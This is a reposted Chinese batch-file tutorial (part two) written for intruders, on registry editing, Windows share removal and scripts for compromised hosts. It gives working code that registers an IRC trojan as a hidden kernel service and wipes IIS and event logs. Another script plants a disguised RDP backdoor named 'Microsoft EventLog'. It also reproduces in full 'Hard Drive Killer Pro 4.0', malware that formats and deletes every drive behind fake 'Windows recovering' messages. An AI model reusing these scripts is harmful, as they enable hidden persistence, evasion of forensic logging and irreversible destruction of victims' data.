【转载】简明批处理教程（第二部分）

五、如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件) 
关于注册表的操作，常见的是创建、修改、删除。 
1.创建 
创建分为两种，一种是创建子项(Subkey) 
我们创建一个文件，内容如下： 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 
然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。 
另一种是创建一个项目名称 
那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下： 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
"Invader"="Ex4rch" 
"Door"=C:\\WINNT\\system32\\door.exe 
"Autodos"=dword:02 
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下 
新建了:Invader、door、about这三个项目 
Invader的类型是“String Value” 
door的类型是“REG SZ Value” 
Autodos的类型是“DWORD Value” 

2.修改 
修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。 
3.删除 
我们首先来说说删除一个项目名称，我们创建一个如下的文件： 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
"Ex4rch"=- 
执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了； 
我们再看看删除一个子项，我们创建一个如下的脚本： 
Windows Registry Editor Version 5.00 
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。 
相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。 
samlpe1:如上面的那个例子,如想生成如下注册表文件 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
"Invader"="Ex4rch" 
"door"=hex:255 
"Autodos"=dword:000000128 
只需要这样： 
@echo Windows Registry Editor Version 5.00>>Sample.reg 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg 
@echo "Invader"="Ex4rch">>Sample.reg 
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg 
@echo "Autodos"=dword:02>>Sample.reg 

samlpe2: 
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) 
@start windrv32.exe 
@attrib +h +r windrv32.exe 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll 
@echo "windsnx "=- >>patch.dll 
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe 
@regedit /s patch.dll 
@delete patch.dll 
@REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动] 
@REM 这样不是更安全^_^. 

六、精彩实例放送

1.删除win2k/xp系统默认共享的批处理 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
@echo preparing to delete all the default shares.when ready pres any key. 
@pause 
@echo off 
:Rem check parameters if null show usage. 
if {%1}=={} goto :Usage 
:Rem code start. 
echo. 
echo ------------------------------------------------------ 
echo. 
echo Now deleting all the default shares. 
echo. 
net share %1$ /delete 
net share %2$ /delete 
net share %3$ /delete 
net share %4$ /delete 
net share %5$ /delete 
net share %6$ /delete 
net share %7$ /delete 
net share %8$ /delete 
net share %9$ /delete 
net stop Server 
net start Server 
echo. 
echo All the shares have been deleteed 
echo. 
echo ------------------------------------------------------ 
echo. 
echo Now modify the registry to change the system default properties. 
echo. 
echo Now creating the registry file 
echo Windows Registry Editor Version 5.00> c:\delshare.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg 
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg 
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg 
echo Nowing using the registry file to chang the system default properties. 
regedit /s c:\delshare.reg 
echo Deleting the temprotarily files. 
del c:\delshare.reg 
goto :END 
:Usage 
echo. 
echo ------------------------------------------------------ 
echo. 
echo ☆ A example for batch file ☆ 
echo ☆ [Use batch file to change the sysytem share properties.] ☆ 
echo. 
echo Author：Ex4rch 
echo Mail:Ex4rch@hotmail.com QQ:1672602 
echo. 
echo Error：Not enough parameters 
echo. 
echo ☆ Please enter the share disk you wanna delete ☆ 
echo. 
echo For instance，to delete the default shares: 
echo delshare c d e ipc admin print 
echo. 
echo If the disklable is not as C: D: E: ，Please chang it youself. 
echo. 
echo example： 
echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ： 
echo delshare c d e x y z ipc admin print 
echo. 
echo *** you can delete nine shares once in a useing *** 
echo. 
echo ------------------------------------------------------ 
goto :EOF 
:END 
echo. 
echo ------------------------------------------------------ 
echo. 
echo OK,delshare.bat has deleted all the share you assigned. 
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. 
echo 
echo. 
echo ------------------------------------------------------ 
echo. 
:EOF 
echo end of the batch file 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
2.全面加固系统（给肉鸡打补丁）的批处理文件 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
@echo Windows Registry Editor Version 5.00 >patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll 
@echo "AutoShareServer"=dword:00000000 >>patch.dll 
@echo "AutoShareWks"=dword:00000000 >>patch.dll 
@REM [禁止共享] 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll 
@echo "restrictanonymous"=dword:00000001 >>patch.dll 
@REM [禁止匿名登录] 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll 
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll 
@REM [禁止及文件访问和打印共享] 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll 
@echo "Start"=dword:00000004 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll 
@echo "Start"=dword:00000004 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll 
@echo "ShutdownWithoutLogon"="0" >>patch.dll 
@REM [禁止登录前关机] 
@echo "DontDisplayLastUserName"="1" >>patch.dll 
@REM [禁止显示前一个登录用户名称] 
@regedit /s patch.dll 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。 
@regedit /s patch.dll 
@net stop w3svc 
@net stop event log 
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 
@del c:\winnt\system32\config\*.event /f /q 
@del c:\winnt\system32dtclog\*.* /f /q 
@del c:\winnt\*.txt /f /q 
@del c:\winnt\*.log /f /q 
@net start w3svc 
@net start event log 
@rem [删除日志] 


@net stop lanmanserver /y 
@net stop Schedule /y 
@net stop RemoteRegistry /y 
@del patch.dll 
@echo The server has been patched,Have fun. 
@del patch.bat 
@REM [禁止一些危险的服务。] 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll 
@echo "PortNumber"=dword:00002010 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll 
@echo "PortNumber"=dword:00002012 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll 
@echo "Start"=dword:00000002 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll 
@echo "Start"=dword:00000002 >>patch.dll 
@echo "ErrorControl"=dword:00000001 >>patch.dll 
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll 
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll 
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll 
@echo "ObjectName"="LocalSystem" >>patch.dll 
@echo "Type"=dword:00000010 >>patch.dll 
@echo "Description"="Keep record of the program and windows' message。" >>patch.dll 
@echo "DisplayName"="Microsoft EventLog" >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll 
@echo "Start"=dword:00000004 >>patch.dll 
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe 
@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路] 

3.Hard Drive Killer Pro Version 4.0（玩批处理到这个水平真的不容易了。） 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
@echo off 
rem This program is dedecated to a very special person that does not want to be named. 
tart 
cls 
echo PLEASE WAIT WHILE PROGRAM LOADS . . . 
call attrib -r -h c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat 
call attrib +r +h c:\autoexec.bat >nul 
rem Drive checking and assigning the valid drives to the drive variable. 

set drive= 
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z 

rem code insertion for Drive Checking takes place here. 
rem drivechk.bat is the file name under the root directory. 
rem As far as the drive detection and drive variable settings, don't worry about how it 
rem works, it's d\*amn to complicated for the average or even the expert batch programmer. 
rem Except for Tom Lavedas. 

echo @echo off >drivechk.bat 
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat 
%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
del {t}.bat 
echo if errorlevel 1 goto enddc >>drivechk.bat 

cls 
echo PLEASE WAIT WHILE PROGRAM LOADS . . . 

rem When errorlevel is 1, then the above is not true, if 0, then it's true. 
rem Opposite of binary rules. If 0, it will elaps to the next command. 

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat 
%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
del {t}.bat 
echo if errorlevel 1 goto enddc >>drivechk.bat 

cls 
echo PLEASE WAIT WHILE PROGRAM LOADS . . . 

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. 
rem if errorlevel is 0, then it will elaps to the next command. 

echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat 
%comspec% /e:2048 /c {t}.bat >>drivechk.bat 
del {t}.bat 
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat 

cls 
echo PLEASE WAIT WHILE PROGRAM LOADS . . . 

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive. 
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive. 

echo :enddc >>drivechk.bat 

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". 

rem Now we will use the program drivechk.bat to attain valid drive information. 

ampledrv 

for %%a in (%alldrive%) do call drivechk.bat %%a >nul 
del drivechk.bat >nul 
if %drive.==. set drive=c 

:form_del 
call attrib -r -h c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat 
echo cls >>c:\autoexec.bat 
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat 
echo cls >>c:\autoexec.bat 
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat 
echo cls >>c:\autoexec.bat 
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat 
echo cls >>c:\autoexec.bat 
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat 
echo cls >>c:\autoexec.bat 
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat 
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat 
echo cd\ >>c:\autoexec.bat 
echo cls >>c:\autoexec.bat 
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat 
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat 
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat 
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:\autoexec.bat 
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:\autoexec.bat 
echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat 

echo echo. >>c:\autoexec.bat 
echo echo Regards, >>c:\autoexec.bat 
echo echo. >>c:\autoexec.bat 
echo echo Munga Bunga >>c:\autoexec.bat 
call attrib +r +h c:\autoexec.bat 

:makedir 
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul 
echo @echo off >c:\temp.bat 
echo %%1:\ >>c:\temp.bat 
echo cd\ >>c:\temp.bat 
echo tartmd >>c:\temp.bat 
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat 
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat 
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat 
call attrib +r +h c:\temp.bat >nul 

cls 
echo Initializing Variables . . . 
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction. 
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul 
cls 
echo Initializing Variables . . . 
echo Validating Data . . . 
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul 
cls 
echo Initializing Variables . . . 
echo Validating Data . . . 
echo Analyzing System Structure . . . 
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul 
call attrib +r +h c:\temp.bat >nul 
call attrib +r +h c:\autoexec.bat >nul 
cls 
echo Initializing Variables . . . 
echo Validating Data . . . 
echo Analyzing System Structure . . . 
echo Initializing Application . . . 

for %%a in (%drive%) call deltree /y %%a:\*. >nul 
cls 
echo Initializing Variables . . . 
echo Validating Data . . . 
echo Analyzing System Structure . . . 
echo Initializing Application . . . 
echo Starting Application . . . 
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul 

cls 
echo Thank you for using a Munga Bunga product. 
echo. 
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. 
echo. 
echo Here is a joke for you . . . 
echo. 
echo Q). What's the worst thing about being an egg? 
echo A). You only get laid once. 
echo. 
echo HAHAHAHA, get it? Don't you just love that one? 
echo. 
echo Regards, 
echo. 
echo Munga Bunga 

:end 

rem Hard Drive Killer Pro Version 4.0, enjoy!!!! 
rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get out of here). 

七、致谢&一些废话 

谨以此文献给所有为实现网络的自由与共享而努力的朋友们。感谢所有共享他们作品的朋友们，让我们为我们的理想一起努力！！ 
部分内容来自http://www.sometips.com。再次特别感谢！ 
本人只提供此教程和有限技术支持，若因此教程而导致相关人员、团体的利益受到侵害，本人拒绝承担任何法律责任，一切责任由相关当事人承担。 
本教程不保留任何版权,您可以自由修改传播,但是当您增加某些内容时,请发一份给我,让我也一起分享您的成果.但是未经本人同意不得将本教程用于商业活动,若您一定要,请确保所得利益的85%用于公益事业（请联系本人并出示相关出示凭证），否则本人保留起诉并追究当事人相关法律责任的权利.如需转载请保留以下信息,谢谢!



【转载】简明批处理教程（第一部分）